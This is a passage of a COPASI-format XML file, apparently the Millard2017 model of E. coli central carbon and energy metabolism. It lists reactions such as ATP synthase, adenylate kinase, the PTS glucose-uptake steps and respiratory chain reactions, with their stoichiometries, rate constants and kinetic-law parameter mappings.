</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4927"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_19"/>
<SourceParameter reference="Metabolite_28"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_42" name="PNT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_42">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:54:17Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_18" stoichiometry="1"/>
<Substrate metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_19" stoichiometry="1"/>
<Product metabolite="Metabolite_20" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4926" name="k1" value="0.1"/>
<Constant key="Parameter_4925" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4926"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_18"/>
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4925"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_19"/>
<SourceParameter reference="Metabolite_20"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_43" name="ADK" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_43">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:48:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_51" stoichiometry="1"/>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_50" stoichiometry="2"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4924" name="Keq" value="0.962758"/>
<Constant key="Parameter_4923" name="k" value="0.242256"/>
</ListOfConstants>
<KineticLaw function="Function_40" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_264">
<SourceParameter reference="Metabolite_50"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_263">
<SourceParameter reference="Metabolite_51"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_262">
<SourceParameter reference="Metabolite_52"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_261">
<SourceParameter reference="Parameter_4924"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_250">
<SourceParameter reference="Parameter_4923"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_44" name="ATP_SYN" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_44">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:48:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_50" stoichiometry="1"/>
<Substrate metabolite="Metabolite_56" stoichiometry="1"/>
<Substrate metabolite="Metabolite_73" stoichiometry="4"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_52" stoichiometry="1"/>
<Product metabolite="Metabolite_64" stoichiometry="4"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4922" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4922"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_56"/>
<SourceParameter reference="Metabolite_73"/>
<SourceParameter reference="Metabolite_73"/>
<SourceParameter reference="Metabolite_73"/>
<SourceParameter reference="Metabolite_73"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_45" name="CYA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_45">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:49:01Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_53" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="2"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4921" name="k1" value="0.1"/>
<Constant key="Parameter_4920" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4921"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_52"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4920"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_53"/>
<SourceParameter reference="Metabolite_56"/>
<SourceParameter reference="Metabolite_56"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_46" name="DOS" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_46">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:49:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_53" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_51" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4919" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4919"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_53"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_47" name="ACK" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_47">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:48:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_2" stoichiometry="1"/>
<Substrate metabolite="Metabolite_50" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_69" stoichiometry="1"/>
<Product metabolite="Metabolite_52" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4918" name="k1" value="0.1"/>
<Constant key="Parameter_4917" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4918"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_2"/>
<SourceParameter reference="Metabolite_50"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4917"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_69"/>
<SourceParameter reference="Metabolite_52"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_48" name="ACS" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_48">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:59:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_69" stoichiometry="1"/>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
<Substrate metabolite="Metabolite_54" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_0" stoichiometry="1"/>
<Product metabolite="Metabolite_51" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="2"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4916" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4916"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_69"/>
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_54"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_49" name="PTA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_49">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T17:09:21Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_0" stoichiometry="1"/>
<Substrate metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_54" stoichiometry="1"/>
<Product metabolite="Metabolite_2" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4915" name="k1" value="0.1"/>
<Constant key="Parameter_4914" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4915"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_0"/>
<SourceParameter reference="Metabolite_56"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4914"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_54"/>
<SourceParameter reference="Metabolite_2"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_50" name="PTS_0" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_50">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T12:14:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_36" stoichiometry="1"/>
<Substrate metabolite="Metabolite_23" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_37" stoichiometry="1"/>
<Product metabolite="Metabolite_27" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4913" name="k1" value="0.1"/>
<Constant key="Parameter_4912" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4913"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_36"/>
<SourceParameter reference="Metabolite_23"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4912"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_37"/>
<SourceParameter reference="Metabolite_27"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_51" name="PTS_1" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_51">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:49:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_42" stoichiometry="1"/>
<Substrate metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_43" stoichiometry="1"/>
<Product metabolite="Metabolite_36" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4911" name="k1" value="200000"/>
<Constant key="Parameter_4910" name="k2" value="8000"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4911"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_42"/>
<SourceParameter reference="Metabolite_37"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4910"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_43"/>
<SourceParameter reference="Metabolite_36"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_52" name="PTS_2" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_52">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:24:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_38" stoichiometry="1"/>
<Substrate metabolite="Metabolite_43" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_39" stoichiometry="1"/>
<Product metabolite="Metabolite_42" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4909" name="k1" value="61000"/>
<Constant key="Parameter_4908" name="k2" value="47000"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4909"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_38"/>
<SourceParameter reference="Metabolite_43"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4908"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_39"/>
<SourceParameter reference="Metabolite_42"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_53" name="PTS_3" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_53">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T12:14:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_40" stoichiometry="1"/>
<Substrate metabolite="Metabolite_39" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_41" stoichiometry="1"/>
<Product metabolite="Metabolite_38" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4907" name="k1" value="11000"/>
<Constant key="Parameter_4906" name="k2" value="4000"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4907"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_40"/>
<SourceParameter reference="Metabolite_39"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4906"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_41"/>
<SourceParameter reference="Metabolite_38"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_54" name="PTS_4" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_54">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T12:14:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_74" stoichiometry="1"/>
<Substrate metabolite="Metabolite_41" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_11" stoichiometry="1"/>
<Product metabolite="Metabolite_40" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4905" name="k1" value="0.1"/>
<Constant key="Parameter_4904" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4905"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_74"/>
<SourceParameter reference="Metabolite_41"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4904"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_11"/>
<SourceParameter reference="Metabolite_40"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_55" name="_GLC_FEED" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_55">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:49:02Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_70" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4903" name="v" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_6" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_49">
<SourceParameter reference="Parameter_4903"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_56" name="CYTBO" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_56">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T09:53:39Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_29" stoichiometry="2"/>
<Substrate metabolite="Metabolite_64" stoichiometry="8"/>
<Substrate metabolite="Metabolite_66" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_28" stoichiometry="2"/>
<Product metabolite="Metabolite_73" stoichiometry="8"/>
<Product metabolite="Metabolite_65" stoichiometry="2"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4902" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4902"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_29"/>
<SourceParameter reference="Metabolite_29"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_64"/>
<SourceParameter reference="Metabolite_66"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_57" name="SQR" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_57">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T13:54:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_68" stoichiometry="1"/>
<Substrate metabolite="Metabolite_28" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_67" stoichiometry="1"/>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4901" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4901"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_68"/>
<SourceParameter reference="Metabolite_28"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_58" name="NDHII" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_58">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-17T08:01:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_19" stoichiometry="1"/>
<Substrate metabolite="Metabolite_28" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_18" stoichiometry="1"/>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4900" name="Vmax" value="30.8306"/>
<Constant key="Parameter_4899" name="KeqNDH" value="27.6193"/>
</ListOfConstants>
<KineticLaw function="Function_41" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_269">
<SourceParameter reference="ModelValue_7"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_268">
<SourceParameter reference="Metabolite_18"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_267">
<SourceParameter reference="Metabolite_19"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_266">
<SourceParameter reference="Metabolite_28"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_265">
<SourceParameter reference="Metabolite_29"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_270">
<SourceParameter reference="Parameter_4900"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_59" name="ATP_MAINTENANCE" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_59">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-21T14:43:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_50" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4898" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4898"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_52"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_60" name="XCH_GLC" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_60">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-23T16:07:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_70" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
